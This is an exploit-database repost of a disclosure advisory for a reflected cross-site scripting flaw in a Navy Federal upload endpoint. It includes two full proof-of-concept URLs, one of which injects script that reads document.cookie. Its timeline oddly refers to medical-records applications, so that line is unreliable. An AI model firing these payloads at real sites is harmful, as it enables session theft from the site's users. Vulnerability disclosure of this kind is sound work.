Advertisement






Navy Federal Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 Contact for pricing High
Author Risk Exploitation Type Date
Unknown High Remote 2020-09-19
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090090

Below is a copy:

Navy Federal Cross Site Scripting
Vendor
-------------------------------------------------
Navy Federal - (https://www.navyfederal.org/

Product
-------------------------------------------------
Front pubic facing application

Credit
-------------------------------------------------
Arthrocyber
http://arthrocyber.com/research/#finding_7

David Reyes

Vulnerability Summary
-------------------------------------------------
The endpoint sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain did not sanitize HTML characters. It was possible to pass HTML code which triggered an XSS.
Technical Details
-------------------------------------------------
The parameter "type" failed to properly sanitize HTML characters resulting in reflective XSS.

https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(%225-2-17--Reflective-Arthrocyber-XSS%22)%3C/script%3E

https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Solution
-------------------------------------------------
Reference OWASP top 10.
https://owasp.org/www-community/attacks/xss/

Timeline
-------------------------------------------------
07 May 2019 - Adaptive Security Consulting discovered a series of vulnerabilities in medical records management and
search applications being considered by our client
September 2020 - Endpoint no longer appears to be vulnerable to XSS.


Juan Avila
Arthrocyber, LLC
Cell (682)238-7188



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum